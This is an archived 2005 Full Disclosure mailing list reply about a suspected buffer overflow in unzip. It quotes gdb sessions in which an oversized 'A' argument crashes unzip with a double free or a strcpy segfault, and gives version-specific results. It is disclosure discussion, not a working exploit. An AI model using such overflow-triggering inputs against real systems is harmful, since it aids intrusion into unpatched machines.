Full Disclosure mailing list archives

Re: Unzip ALL verisons ;))

From: Rodrigo Barbosa <rodrigob () suespammers org>
Date: Mon, 19 Dec 2005 15:07:53 -0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, Dec 19, 2005 at 05:27:15PM +0100, Joachim Schipper wrote:

On Mon, Dec 19, 2005 at 12:06:07PM +0000, c0ntex wrote:

Just to add to the pot, this little bug has been there a long time,
mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with
rather large files?

;)

[c0ntex@linuxbox tmp]$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...unzip: 
cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[snip]

AAAAAAAAAAAAAA.ZIP.
*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.
0xffffe410 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x002a2955 in raise () from /lib/tls/libc.so.6
#2  0x002a4319 in abort () from /lib/tls/libc.so.6
#3  0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
#5  0x080543a6 in ?? ()
#6  0x08075008 in ?? ()
#7  0x00000005 in ?? ()
#8  0x00000000 in ?? ()


I cannot reproduce this, either with "A" x 5000 or "A" x 20000. I tested
unzip-5.52 on Linux/i386-2.6 and OpenBSD/i386-3.8, and saw no error.


Got a nasty explosion here. CentOS 4.2, Unzip-5.51:

(gdb) r `perl -e 'print "A" x 5000'`                                          
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x00197956 in strcpy () from /lib/tls/libc.so.6

Best Regards,

- -- 
Rodrigo Barbosa <rodrigob () suespammers org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDpujppdyWzQ5b5ckRAj9uAKCqvcOLd5l+jzQus73rBPX7+ci4awCeNEIP
9zefoQnC9RPTEUghQtRDUeE=
=G3he
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
  - Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
    - Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
    - Re: Unzip *ALL* verisons ;)) deepquest (Dec 19)
    - Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
    - Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
    - Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
    - Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
    - Re: Unzip *ALL* verisons ;)) GroundZero Security (Dec 19)
  - Re: Unzip *ALL* verisons ;)) Rodrigo Barbosa (Dec 19)
- <Possible follow-ups>
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- RE: Unzip *ALL* verisons ;)) Bob Dehnhardt (Dec 19)

Full Disclosure mailing list archives

Re: Unzip *ALL* verisons ;))

Current thread:

Re: Unzip ALL verisons ;))